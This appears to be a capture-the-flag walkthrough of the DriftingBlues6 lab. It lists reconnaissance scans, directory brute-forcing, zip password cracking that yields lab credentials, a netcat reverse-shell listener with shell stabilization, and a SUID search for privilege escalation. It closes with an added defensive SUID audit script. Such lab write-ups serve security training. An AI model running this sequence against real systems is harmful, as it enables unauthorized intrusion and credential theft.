๐ŸฆDriftingBlues6

nmap -sC -sV -A -oN <outfile> <ip>

nmap -sC -sV -A -p- -oN <outfile> <ip>

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10

nmap -sV -sT -p445 --script vuln <ip>
nmap -sV -sT -p445 --script safe <ip>
nmap -sV -sT -p445 --script "vuln and safe" <ip>

nmap -p 21,22,80 -sC -sV -A -oN nmapscripts.txt 192.168.221.219

Enumerate Port 80

Will try steganography on the image (db.jpeg).

steghide extract -sf db.jpeg

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.221.219/

/index

/db

/robots

/spammer

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.221.219/FUZZ -fl 480

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.221.219/FUZZ

dirb http://192.168.221.219/

dirsearch -u http://192.168.221.219/ -e php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Identify web technologies

whatweb -a 3 http://192.168.221.219/

Identify WAF

wafw00f -a http://192.168.221.219/

CMS scanning tools

Clusterd, CMSScan, VulnX, droopescan, joomlavs, wpscan, cmsmap

./clusterd.py [options]

vulnx -u http://example.com

droopescan scan drupal -u http://example.org/

ruby joomlavs.rb -u examplejoomla.com --scan-all

wpscan --url http://examplewordpress.com/ -e u,ap,at

cmsmap.py https://example.com

wpscan --url http://192.168.221.219/ -e u,ap,at

Will try navigating to the identified directories.

/textpattern/textpattern

unzip spammer.zip

Attempting to unzip it, I found it was password protected.

Will try to use zip2john to get the password hash.

zip2john spammer.zip

zip2john spammer.zip > spammer4john

Delete everything in the hash file before the initial $ (the filename prefix zip2john adds), which made it readable for Hashcat.

hashcat spammer4john -m 17225 /usr/share/wordlists/rockyou.txt

Hashcat very quickly cracked the hash and revealed the password to the zip file. It's 'myspace4'.

Now we will unzip the spammer file using the above password. It contains the credentials:

mayer:lionheart

Textpattern CMS v4.8.3: will try to find an exploit for this version.

run nc -nvlp 4444

Once the above link is clicked:

Will run the shell-stabilization commands:

python -c 'import pty; pty.spawn("/bin/bash")'

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp

export TERM=xterm-256color

ctrl+z

stty raw -echo ; fg ; reset

stty columns 200 rows 200

Escalation

After stabilizing my shell, I started my escalation by checking for SUID binaries, trying to see if anything stood out as vulnerable.

find / -perm -u=s 2>/dev/null
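The SUID check above is also the one a defender should run on a schedule: the same `find` against a recorded baseline makes a new or unexpected setuid binary stand out. The script below is an added example, not part of the original notes; its function names and the sample directory tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): a small defender-side
# SUID audit. Record the known-good set of setuid files once, then report
# anything that shows up later.

# list_suid ROOT : print setuid regular files under ROOT, one per line, sorted
list_suid() {
    find "$1" -xdev -type f -perm -u=s 2>/dev/null | sort
}

# record_baseline ROOT FILE : save the current SUID set as the known-good list
record_baseline() {
    list_suid "$1" > "$2"
}

# suid_drift ROOT FILE : print SUID files under ROOT that are absent from the
# baseline FILE; prints nothing when the system still matches the baseline
suid_drift() {
    list_suid "$1" | grep -v -x -F -f "$2" || true
}

# Demo on a constructed directory tree (sample data, not a real system):
# one expected SUID file goes into the baseline, a second one appears later.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin"
    printf '#!/bin/sh\n' > "$tmp/bin/ping" && chmod 4755 "$tmp/bin/ping"
    record_baseline "$tmp" "$tmp/baseline.txt"
    printf '#!/bin/sh\n' > "$tmp/bin/helper" && chmod 4755 "$tmp/bin/helper"
    suid_drift "$tmp" "$tmp/baseline.txt"   # reports only .../bin/helper
    rm -rf "$tmp"
}
```

On a real host, run `record_baseline / /var/lib/suid-baseline.txt` after provisioning and `suid_drift / /var/lib/suid-baseline.txt` from cron; any output is worth an alert.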
